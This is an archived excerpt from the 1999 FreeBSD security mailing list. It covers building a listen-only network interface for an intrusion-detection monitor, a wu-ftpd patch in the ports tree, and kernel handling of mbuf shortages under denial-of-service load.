Reed'" Subject: RE: Lisen only NIC Date: Thu, 9 Sep 1999 10:55:06 -0400 X-Mailer: Internet Mail Service (5.5.2448.0) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I was reading an old article from AT&T Bell Labs that talked about cutting the transmit line and doing a few other things so a machine could listen but not speak. There Be Dragons: http://www.rootshell.org/docs/dragons_bellovin.ps.gz > -----Original Message----- > From: Darren Reed [SMTP:avalon@coombs.anu.edu.au] > Sent: Thursday, September 09, 1999 10:34 AM > To: Goran.Lowkrantz@infologigruppen.se > Cc: newton@atdot.dotat.org; Goran.Lowkrantz@infologigruppen.se; > freebsd-security@FreeBSD.ORG > Subject: Re: Lisen only NIC > > Err, this can do bad things like make your hub/switch think your station > has dropped off the network and hence get 0 packets. > > In some mail from Lowkrantz, Goran, sie said: > > > > Yes! > > > > Cut the transmit pin on your patchlead. > > > > - mark > > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 7:59:13 1999 Delivered-To: freebsd-security@freebsd.org Received: from thoth.mch.sni.de (thoth.mch.sni.de [192.35.17.2]) by hub.freebsd.org (Postfix) with ESMTP id AFAA5152E9 for ; Thu, 9 Sep 1999 07:59:06 -0700 (PDT) (envelope-from ust@cert.siemens.de) X-Envelope-Sender-Is: ust@cert.siemens.de (at relayer thoth.mch.sni.de) Received: from mail2.siemens.de (mail2.siemens.de [139.25.208.14]) by thoth.mch.sni.de (8.9.3/8.9.3) with ESMTP id QAA06051; Thu, 9 Sep 1999 16:58:36 +0200 (MET DST) Received: from mars.cert.siemens.de (ust.mchp.siemens.de [139.23.201.17]) by mail2.siemens.de (8.9.3/8.9.3) with ESMTP id QAA28885; Thu, 9 Sep 1999 16:58:35 +0200 (MET DST) Received: from alaska.cert.siemens.de (alaska.cert.siemens.de [139.23.202.134]) by mars.cert.siemens.de (8.9.3/8.9.3/Siemens CERT [ $Revision: 1.9 ]) with ESMTP id QAA83025; Thu, 9 Sep 1999 16:58:35 +0200 (CEST) Received: (from ust@localhost) by alaska.cert.siemens.de (8.9.3/8.9.3/alaska [ $Revision: 1.2 ]) id OAA51824; Thu, 9 Sep 1999 14:58:35 GMT (envelope-from ust) Date: Thu, 9 Sep 1999 16:58:34 +0200 From: Udo Schweigert To: "Rashid N. Achilov" Cc: Ruslan Ermilov , Bill Fink , security@FreeBSD.ORG Subject: Re: FTP Vulnerability Message-ID: <19990909165834.A51466@alaska.cert.siemens.de> References: <19990909162255.A15548@relay.ucb.crimea.ua> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0pre2i In-Reply-To: X-Operating-System: FreeBSD 3.3-RC Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Sep 09, 1999 at 08:54:08PM +0700, Rashid N. Achilov wrote: > On Thu, 9 Sep 1999, Ruslan Ermilov wrote: > > > > I've visited the mirrors for the WUFTP site(s) looking for the versions > > > "after August 30" and there's NOTHING newer than MAY. > > > > > The versions we are talking about refer to the FreeBSD ports collection. > > Port of wu-ftpd (/usr/ports/net/wu-ftpd) has been upgraded to apply the > > following patch: > > > > ftp://ftp.wu-ftpd.org/pub/wu-ftpd/quickfixes/apply_to_2.5.0/mapped.path.overrun.patch > > On this site mapped.overrun... dated August,24. > In ports tree in patches subdir newest patch dated April,7 :-) > That's OK, because the patch will be downloaded when doing the "make". Makefile contains: PATCH_SITES= ftp://ftp.wu-ftpd.org/pub/wu-ftpd/quickfixes/apply_to_2.5.0/ PATCHFILES= \ data-limit.patch \ deny.not.nameserved.patch \ mapped.path.overrun.patch \ not.in.class.patch \ rfc931.timeout.patch Regards ------------------------------------------------------------------------------- Udo Schweigert || Voice : +49 89 636 42170 Siemens AG, Siemens CERT || Fax : +49 89 636 48000 ZT IK 3 || email : Udo.Schweigert@mchp.siemens.de D-81730 Muenchen / Germany || : ust@cert.siemens.de PGP fingerprint || 2A 53 F6 A6 30 59 64 02 6B C4 E0 73 B2 C9 6C E7 ------------------------------------------------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 8: 9: 2 1999 Delivered-To: freebsd-security@freebsd.org Received: from puck.nether.net (puck.nether.net [204.42.254.5]) by hub.freebsd.org (Postfix) with ESMTP id CC87C15200; Thu, 9 Sep 1999 08:08:56 -0700 (PDT) (envelope-from jared@puck.nether.net) Received: (from jared@localhost) by puck.nether.net (8.9.3/8.7.3) id LAA07503; Thu, 9 Sep 1999 11:07:20 -0400 (envelope-from jared) Date: Thu, 9 Sep 1999 11:07:20 -0400 From: Jared Mauch To: Stas Kisel Cc: avalon@coombs.anu.edu.au, freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: mbuf shortage situations Message-ID: <19990909110720.A6694@puck.nether.net> Mail-Followup-To: Stas Kisel , avalon@coombs.anu.edu.au, freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG References: <199909091015.UAA02113@cheops.anu.edu.au> <199909090945.NAA18133@sonet.crimea.ua> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0pre2i In-Reply-To: <199909090945.NAA18133@sonet.crimea.ua> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Sep 09, 1999 at 01:45:39PM +0400, Stas Kisel wrote: > > From: Darren Reed > > > The problem with this is the BSD TCP/IP implementation ACK's (or at least > > attempts to ACK) data as soon as it is received and it is a big no-no to > > discard queued data that has already been ACK'd. > > Probably it is not self-evident why we HAVE to drop this connection. > > It is evil connection. Good applications do read data from their sockets, > and evil ones do not. And ever if it is good, but silly or busy > application, good clients do not send so much data that application > can not process it. Am I wrong, there are any examples? (I have a program that is built to process this all, and works well on the non *bsd unicies, and has had a few problems on the *bsd based ones.. read on...) I posted a message on bugtraq related to this, and archive related mail to -current links are here: http://www.freebsd.org/cgi/getmsg.cgi?fetch=340672+354590+/usr/local/www/db/text/1998/freebsd-current/19980524.freebsd-current http://www.freebsd.org/cgi/getmsg.cgi?fetch=246072+248435+/usr/local/www/db/text/1998/freebsd-current/19980524.freebsd-current Now the problems that I have are partially design issues in my program, and partially not. I am creating about 100 icmp sockets, and as they are created, allocate a very large SO_RCVBUF: (void)setsockopt(localstruct->icmp_s, SOL_SOCKET, SO_RCVBUF, (char *)&hold, sizeof(hold)); Where hold = (60*300) ie: hold 300 packets. Because I can be sending 100 icmp echo-requests out in a second, I can get at least that many replies back, if not more if some come out of order or delayed by more than 1 second. I also need to filter through all the icmp traffic that is coming to the system. (You can see my code, and comments are welcome to me directly, code available from ftp://puck.nether.net/pub/jared/sysmon* [if possible, my -current is in jared/beta/*, use that, but there have been little changes to that code currently]). I would get out of mbufs, increase maxusers. Either my code is less agressive than originally, or something has changed in some of the freebsd releases since then, even slightly to prevent this from currently happening. I'm not sure which. NetBSD also suffers from this problem, and is more evident than FreeBSD right now. - Jared -- Jared Mauch | pgp key available via finger from jared@puck.nether.net clue++; | http://puck.nether.net/~jared/ My statements are only mine. END OF LINE | To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 8:12:24 1999 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id BD3EB151CD for ; Thu, 9 Sep 1999 08:12:18 -0700 (PDT) (envelope-from des@flood.ping.uio.no) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id RAA00959; Thu, 9 Sep 1999 17:11:50 +0200 (CEST) (envelope-from des) To: Mark Newton Cc: Goran.Lowkrantz@infologigruppen.se (Lowkrantz, Goran), freebsd-security@FreeBSD.ORG Subject: Re: Lisen only NIC References: <199909091415.XAA72769@atdot.dotat.org> From: Dag-Erling Smorgrav Date: 09 Sep 1999 17:11:49 +0200 In-Reply-To: Mark Newton's message of "Thu, 9 Sep 1999 23:45:07 +0930 (CST)" Message-ID: Lines: 18 X-Mailer: Gnus v5.5/Emacs 19.34 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Mark Newton writes: > Lowkrantz, Goran wrote: > > To check on our DMZs I am building a monitor system with a protected > > interface connected to the internal network and a multiport card to monitor > > the consoles of the systems in the DMZs. To check for attacks I have setup > > Snort and have tested with the Vision IDS but I want to hide the network > > interface completely so that it can't be seen or heard or attacked or > > anything. > Cut the transmit pin on your patchlead. No. You'll lose link. Instead, use an external tranceiver and cut the transmit pin on the AUI end of the tranceiver. Search the BUGTRAQ archives for URLs to detailed descriptions of how to do this (and why cutting the transmit pin on a 10BaseT patch cable won't work) DES -- Dag-Erling Smorgrav - des@flood.ping.uio.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 8:12:40 1999 Delivered-To: freebsd-security@freebsd.org Received: from verdi.nethelp.no (verdi.nethelp.no [158.36.41.162]) by hub.freebsd.org (Postfix) with SMTP id 6F4ED15CB8 for ; Thu, 9 Sep 1999 08:12:17 -0700 (PDT) (envelope-from sthaug@nethelp.no) Received: (qmail 4514 invoked by uid 1001); 9 Sep 1999 15:11:55 +0000 (GMT) To: Goran.Lowkrantz@infologigruppen.se Cc: rbezuide@oskar.nanoteq.co.za, avalon@coombs.anu.edu.au, newton@atdot.dotat.org, freebsd-security@FreeBSD.ORG Subject: RE: Lisen only NIC From: sthaug@nethelp.no In-Reply-To: Your message of "Thu, 9 Sep 1999 16:48:40 +0200 " References: X-Mailer: Mew version 1.05+ on Emacs 19.34.2 Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Date: Thu, 09 Sep 1999 17:11:55 +0200 Message-ID: <4512.936889915@verdi.nethelp.no> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Couldn't this work if this NIC with the no-TX cable was using the same IP > address as another, active computer on the same segment? No. There are "link pulses" sent on this cable at regular intervals. If you cut the cable, link down is detected. If you want a "receive only" TP cable, you need some electronics. There are companies that make these, see for instance http://www.anzen.com/afj/afj_faq.html#anchor157338 Steinar Haug, Nethelp consulting, sthaug@nethelp.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 8:51: 3 1999 Delivered-To: freebsd-security@freebsd.org Received: from sonet.crimea.ua (OTC-sl3-FLY.CRIS.NET [212.110.136.71]) by hub.freebsd.org (Postfix) with ESMTP id 23BC114C1C; Thu, 9 Sep 1999 08:47:50 -0700 (PDT) (envelope-from stas@sonet.crimea.ua) Received: (from stas@localhost) by sonet.crimea.ua (8.8.8/8.8.8) id SAA24055; Thu, 9 Sep 1999 18:47:49 +0400 (MSD) (envelope-from stas) Date: Thu, 9 Sep 1999 18:47:49 +0400 (MSD) From: Stas Kisel Message-Id: <199909091447.SAA24055@sonet.crimea.ua> To: avalon@coombs.anu.edu.au, stas@sonet.crimea.ua Subject: Re: mbuf shortage situations Cc: freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG In-Reply-To: <199909091315.XAA05192@cheops.anu.edu.au> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > From avalon@cheops.anu.edu.au Thu Sep 9 16:17:27 1999 > > Probably it is not self-evident why we HAVE to drop this connection. > > So what if someone manages to crash a program due to a DOS attack ? > An easy one that comes to mind is syslogd. It's often stuck in disk-wait > and can easily be targetted with a large number of packets. 1. If ever syslog used (or will use) TCP, it should drop the connection which is logging data too quickly. OS shouldn't kill process, only drop connection. So no crash. More examples? 2. udp_drain() may either drop all packets or intellectually select "offending" socket and try to avoid deletion of "right" packets and simplifying spoofing. RFC allows 1st way, but 2-nd can improve OS. 3. Another idea. Apart from the *_drain() method. Probably I ever will try to implement it somedays (quite low probability, though). Set TCP window in a packets according to really available kernel memory. Available memory should be distributed non-uniformly between maximum number of sockets. So 1-st socket has window= =64k-still_not_read_data, and 1024-th has window=MIN_WINDOW- -still_not_read_data. MIN_WINDOW should be determined for max efficiency. About 2k. Distribution can not be linear - it isapproximately like min(NORM*1/x,64k). Exactly it can be determined via functional equation. Something like \integral_0^maxsockets{dist(x)dx}=kernel_memory and several conditions. (sorry for my poor TeX). In a case of attack new sockets will be created with a very small window - about 2k. Please blame me as much as possible - probably I have missed some significant detail. Probably all this math suxx and the best is a "stair" function - somebody already works on lowering TCP window, if I didn't mistaken. -- Stas Kisel. UNIX, security, C, TCP/IP, Web. UNIX - the best adventure game http://www.tekmetrics.com/transcript.shtml?pid=20053 http://www.crimea.edu +380(652)510222,230238 ; stas@crimea.edu stas@sonet.crimea.ua ; 2:460/54.4 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 10: 1:28 1999 Delivered-To: freebsd-security@freebsd.org Received: from dingo.cdrom.com (dingo.cdrom.com [204.216.28.145]) by hub.freebsd.org (Postfix) with ESMTP id 0C82215024; Thu, 9 Sep 1999 10:01:24 -0700 (PDT) (envelope-from mike@dingo.cdrom.com) Received: from dingo.cdrom.com (localhost.cdrom.com [127.0.0.1]) by dingo.cdrom.com (8.9.3/8.8.8) with ESMTP id JAA00464; Thu, 9 Sep 1999 09:53:44 -0700 (PDT) (envelope-from mike@dingo.cdrom.com) Message-Id: <199909091653.JAA00464@dingo.cdrom.com> X-Mailer: exmh version 2.0.2 2/24/98 To: Jared Mauch Cc: freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: mbuf shortage situations In-reply-to: Your message of "Thu, 09 Sep 1999 11:07:20 EDT." <19990909110720.A6694@puck.nether.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Thu, 09 Sep 1999 09:53:44 -0700 From: Mike Smith Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > I would get out of mbufs, increase maxusers. Either my code > is less agressive than originally, or something has changed in > some of the freebsd releases since then, even slightly to prevent this > from currently happening. I'm not sure which. NetBSD also suffers > from this problem, and is more evident than FreeBSD right now. Maxusers was bumped in the FreeBSD GENERIC kernel, partly to deal with situations like yours where the old default was simply too small. -- \\ The mind's the standard \\ Mike Smith \\ of the man. \\ msmith@freebsd.org \\ -- Joseph Merrick \\ msmith@cdrom.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 10:24:37 1999 Delivered-To: freebsd-security@freebsd.org Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id 49E9B152A3 for ; Thu, 9 Sep 1999 10:24:33 -0700 (PDT) (envelope-from freebsd@gndrsh.dnsmgr.net) Received: (from freebsd@localhost) by gndrsh.dnsmgr.net (8.9.3/8.9.3) id KAA18571; Thu, 9 Sep 1999 10:21:20 -0700 (PDT) (envelope-from freebsd) From: "Rodney W. Grimes" Message-Id: <199909091721.KAA18571@gndrsh.dnsmgr.net> Subject: Re: Lisen only NIC In-Reply-To: from Dag-Erling Smorgrav at "Sep 9, 1999 05:11:49 pm" To: des@flood.ping.uio.no (Dag-Erling Smorgrav) Date: Thu, 9 Sep 1999 10:21:20 -0700 (PDT) Cc: newton@atdot.dotat.org (Mark Newton), Goran.Lowkrantz@infologigruppen.se (Lowkrantz Goran), freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Mark Newton writes: > > Lowkrantz, Goran wrote: > > > To check on our DMZs I am building a monitor system with a protected > > > interface connected to the internal network and a multiport card to monitor > > > the consoles of the systems in the DMZs. To check for attacks I have setup > > > Snort and have tested with the Vision IDS but I want to hide the network > > > interface completely so that it can't be seen or heard or attacked or > > > anything. > > Cut the transmit pin on your patchlead. > > No. You'll lose link. Instead, use an external tranceiver and cut the > transmit pin on the AUI end of the tranceiver. Search the BUGTRAQ > archives for URLs to detailed descriptions of how to do this (and why > cutting the transmit pin on a 10BaseT patch cable won't work) Do any of them talk about drilling the trace between the NIC chip and the MAU chip/isolation? Thats where the ``AUI'' cable is now :-) This is often best done on the input side of the isolation transformer so that the input to the MAU chip is still properly balanced. -- Rod Grimes - KD7CAX - (RWG25) rgrimes@gndrsh.dnsmgr.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 10:36:57 1999 Delivered-To: freebsd-security@freebsd.org Received: from kerouac.deepwell.com (deepwell.com [209.63.174.12]) by hub.freebsd.org (Postfix) with SMTP id 7ABB015833 for ; Thu, 9 Sep 1999 10:36:53 -0700 (PDT) (envelope-from freebsd@deepwell.com) Received: (qmail 28630 invoked from network); 9 Sep 1999 18:21:00 -0000 Received: from proxy.dcomm.net (HELO terry) (209.63.175.10) by deepwell.com with SMTP; 9 Sep 1999 18:21:00 -0000 Message-Id: <4.2.0.58.19990909102743.03450da0@mail1.dcomm.net> X-Sender: freebsd@mail.deepwell.com X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.58 Date: Thu, 09 Sep 1999 10:27:56 -0700 To: Darren Reed , Goran.Lowkrantz@infologigruppen.se, freebsd-security@freebsd.org From: Deepwell Internet Subject: Re: Lisen only NIC Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Yes, I remember hearing that 10Base-T needs a "heartbeat" signal on the TX lead. I think your best bet is to use an AUI card with an AUI to 10Base-T adapter. You can cut leads from the AUI adapter. At 12:34 AM 9/10/99 +1000, you wrote: >Err, this can do bad things like make your hub/switch think your station >has dropped off the network and hence get 0 packets. > >In some mail from Lowkrantz, Goran, sie said: > > > > Yes! > > > > -----Original Message----- > > From: Mark Newton [mailto:newton@atdot.dotat.org] > > Sent: Thursday, September 09, 1999 4:15 PM > > To: Goran.Lowkrantz@infologigruppen.se > > Cc: freebsd-security@FreeBSD.ORG > > Subject: Re: Lisen only NIC > > > > > > Lowkrantz, Goran wrote: > > > > > To check on our DMZs I am building a monitor system with a protected > > > interface connected to the internal network and a multiport card to > > monitor > > > the consoles of the systems in the DMZs. To check for attacks I have > > setup > > > Snort and have tested with the Vision IDS but I want to hide the network > > > interface completely so that it can't be seen or heard or attacked or > > > anything. > > > > Cut the transmit pin on your patchlead. > > > > - mark > > > > -------------------------------------------------------------------- > > I tried an internal modem, newton@atdot.dotat.org > > but it hurt when I walked. Mark Newton > > ----- Voice: +61-4-1620-2223 ------------- Fax: +61-8-82231777 ----- > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 10:44:34 1999 Delivered-To: freebsd-security@freebsd.org Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id DE290152DF for ; Thu, 9 Sep 1999 10:44:30 -0700 (PDT) (envelope-from freebsd@gndrsh.dnsmgr.net) Received: (from freebsd@localhost) by gndrsh.dnsmgr.net (8.9.3/8.9.3) id KAA18619; Thu, 9 Sep 1999 10:42:09 -0700 (PDT) (envelope-from freebsd) From: "Rodney W. Grimes" Message-Id: <199909091742.KAA18619@gndrsh.dnsmgr.net> Subject: Re: Lisen only NIC In-Reply-To: <199909091721.KAA18571@gndrsh.dnsmgr.net> from "Rodney W. Grimes" at "Sep 9, 1999 10:21:20 am" To: freebsd@gndrsh.dnsmgr.net (Rodney W. Grimes) Date: Thu, 9 Sep 1999 10:42:09 -0700 (PDT) Cc: des@flood.ping.uio.no (Dag-Erling Smorgrav), newton@atdot.dotat.org (Mark Newton), Goran.Lowkrantz@infologigruppen.se (Lowkrantz Goran), freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > Mark Newton writes: > > > Lowkrantz, Goran wrote: > > > > To check on our DMZs I am building a monitor system with a protected > > > > interface connected to the internal network and a multiport card to monitor > > > > the consoles of the systems in the DMZs. To check for attacks I have setup > > > > Snort and have tested with the Vision IDS but I want to hide the network > > > > interface completely so that it can't be seen or heard or attacked or > > > > anything. > > > Cut the transmit pin on your patchlead. > > > > No. You'll lose link. Instead, use an external tranceiver and cut the > > transmit pin on the AUI end of the tranceiver. Search the BUGTRAQ > > archives for URLs to detailed descriptions of how to do this (and why > > cutting the transmit pin on a 10BaseT patch cable won't work) > > Do any of them talk about drilling the trace between the NIC chip and > the MAU chip/isolation? Thats where the ``AUI'' cable is now :-) > > This is often best done on the input side of the isolation transformer > so that the input to the MAU chip is still properly balanced. Strike that last comment, the isolation transformer location depends on the type of MAU, it may be on the wrong side and ends up being the same thing as cutting the patch cord. What was I thinking!! Anyway for 10Base2 this is almost always trivial, if it has an 8392 MAU chip with a Pulse or Valor transformer it will be pins 7 & 8 of the transformer, don't cut pins 9 & 10, you'll unbalance the inputs to the MAU and it may oscilate. Some place I have a nic with 3 dip switches on it ``deaf, dumb, and baligerant''. Basically the switches open up pins 4,5, 7,8 and 1,2 of the transformer. Real handy for network lab testing... -- Rod Grimes - KD7CAX - (RWG25) rgrimes@gndrsh.dnsmgr.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 10:55:14 1999 Delivered-To: freebsd-security@freebsd.org Received: from puck.nether.net (puck.nether.net [204.42.254.5]) by hub.freebsd.org (Postfix) with ESMTP id 8E81F14BE4 for ; Thu, 9 Sep 1999 10:55:06 -0700 (PDT) (envelope-from jared@puck.nether.net) Received: (from jared@localhost) by puck.nether.net (8.9.3/8.7.3) id NAA14345; Thu, 9 Sep 1999 13:54:22 -0400 (envelope-from jared) Date: Thu, 9 Sep 1999 13:54:22 -0400 From: Jared Mauch To: Darren Reed Cc: Stas Kisel , freebsd-security@FreeBSD.ORG Subject: Re: mbuf shortage situations Message-ID: <19990909135422.C11644@puck.nether.net> Mail-Followup-To: Darren Reed , Stas Kisel , freebsd-security@FreeBSD.ORG References: <199909090802.MAA16555@sonet.crimea.ua> <199909091015.UAA02113@cheops.anu.edu.au> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0pre2i In-Reply-To: <199909091015.UAA02113@cheops.anu.edu.au> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Sep 09, 1999 at 08:15:47PM +1000, Darren Reed wrote: > In some mail from Stas Kisel, sie said: > [...] > > IMHO it is a good idea to develop tcp_drain() from /sys/netinet/tcp_subr.c > > It should be quite intellectual to select a target - a process or a uid, > > which does not read properly from it's sockets, and has many data in mbufs. > > The problem with this is the BSD TCP/IP implementation ACK's (or at least > attempts to ACK) data as soon as it is received and it is a big no-no to > discard queued data that has already been ACK'd. Would it be possible to get it out of mbuf's before it's ack'ed, and send ack after that? This way you prevent it from having that problem. Also, I believe it would be suitable to drop udp/icmp stuff from buffers if there is a problem, as those are designed to handle loss properly, as tcp isn't. If I miss a dns response, or icmp response, I'm not gonna cry. But if tcp sessions all start catching resets, that would be a problem. - jared -- Jared Mauch | pgp key available via finger from jared@puck.nether.net clue++; | http://puck.nether.net/~jared/ My statements are only mine. END OF LINE | To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 10:59:25 1999 Delivered-To: freebsd-security@freebsd.org Received: from kerouac.deepwell.com (deepwell.com [209.63.174.12]) by hub.freebsd.org (Postfix) with SMTP id 8792F14BE4 for ; Thu, 9 Sep 1999 10:59:23 -0700 (PDT) (envelope-from freebsd@deepwell.com) Received: (qmail 522 invoked from network); 9 Sep 1999 18:43:35 -0000 Received: from proxy.dcomm.net (HELO terry) (209.63.175.10) by deepwell.com with SMTP; 9 Sep 1999 18:43:35 -0000 Message-Id: <4.2.0.58.19990909104023.00d0d7e0@mail1.dcomm.net> X-Sender: freebsd@mail.deepwell.com X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.58 Date: Thu, 09 Sep 1999 10:50:30 -0700 To: "Rodney W. Grimes" , freebsd-security@freebsd.org From: Deepwell Internet Subject: Re: Lisen only NIC In-Reply-To: <199909091742.KAA18619@gndrsh.dnsmgr.net> References: <199909091721.KAA18571@gndrsh.dnsmgr.net> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org There was a thread on Bugtraq about 2 months ago called "anti-sniffer-sniffer" that went into talking about cutting the Xmit capabilities from a NIC. I only mention this because this thread is going the same direction. Are there certain cards or chipsets that would work well with this idea of disabling a trace on the NIC itself? It seems as though most NICs anymore are just a single QFP integrated circuit which does all the ethernet manipulation as well as any PCI bus interaction. When I see a NIC anymore it's most often just an Integrated Circuit, an isolation transformer, and a few surface mount capacitors. These everything-in-one-chip cards don't seem like they'd be good candidates for a project like this, but you can't buy anything else in the stores anymore. Better yet, is there a good candidate ethernet chipset that interacts with the ISA bus rather than PCI? This could be incorporated into a PC-104 accessory card which would work well on a small standalone box running FreeBSD. -Terry > > > No. You'll lose link. Instead, use an external tranceiver and cut the > > > transmit pin on the AUI end of the tranceiver. Search the BUGTRAQ > > > archives for URLs to detailed descriptions of how to do this (and why > > > cutting the transmit pin on a 10BaseT patch cable won't work) > > > > Do any of them talk about drilling the trace between the NIC chip and > > the MAU chip/isolation? Thats where the ``AUI'' cable is now :-) > > > > This is often best done on the input side of the isolation transformer > > so that the input to the MAU chip is still properly balanced. > >Strike that last comment, the isolation transformer location depends on >the type of MAU, it may be on the wrong side and ends up being the >same thing as cutting the patch cord. >What was I thinking!! Anyway for 10Base2 this is almost always trivial, >if it has an 8392 MAU chip with a Pulse or Valor transformer it will >be pins 7 & 8 of the transformer, don't cut pins 9 & 10, you'll unbalance >the inputs to the MAU and it may oscilate. > >Some place I have a nic with 3 dip switches on it ``deaf, dumb, and >baligerant''. Basically the switches open up pins 4,5, 7,8 and >1,2 of the transformer. Real handy for network lab testing... > >-- >Rod Grimes - KD7CAX - (RWG25) rgrimes@gndrsh.dnsmgr.net > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 11: 0:20 1999 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id DFC5D15C8A for ; Thu, 9 Sep 1999 11:00:12 -0700 (PDT) (envelope-from Cy.Schubert@uumail.gov.bc.ca) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id KAA04701; Thu, 9 Sep 1999 10:59:08 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda04699; Thu Sep 9 10:58:57 1999 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.3/8.9.1) id KAA01232; Thu, 9 Sep 1999 10:58:57 -0700 (PDT) Message-Id: <199909091758.KAA01232@passer.osg.gov.bc.ca> Received: from localhost.osg.gov.bc.ca(127.0.0.1), claiming to be "passer.osg.gov.bc.ca" via SMTP by localhost.osg.gov.bc.ca, id smtpdkJ1226; Thu Sep 9 10:58:47 1999 X-Mailer: exmh version 2.0.2 2/24/98 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 3.2-RELEASE X-Sender: cy To: Reinier Bezuidenhout Cc: avalon@coombs.anu.edu.au (Darren Reed), Goran.Lowkrantz@infologigruppen.se, newton@atdot.dotat.org, freebsd-security@FreeBSD.ORG Subject: Re: Lisen only NIC In-reply-to: Your message of "Sat, 09 Sep 1999 16:46:55 +0200." <199909091446.QAA13441@oskar.nanoteq.co.za> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Thu, 09 Sep 1999 10:58:47 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <199909091446.QAA13441@oskar.nanoteq.co.za>, Reinier Bezuidenhout wr ites: > > Err, this can do bad things like make your hub/switch think your station > > has dropped off the network and hence get 0 packets. > > Yep ... this is true ... we've tried it before and failed :) > > The other thing todo is to try and remove the transmit code > from the card driver :) why not, ipfw add 1 deny all ip from any to any out via xl0 Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Open Systems Group Internet: Cy.Schubert@uumail.gov.bc.ca ITSD Cy.Schubert@gems8.gov.bc.ca Province of BC "e**(i*pi)+1=0" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 9 11:20:42 1999 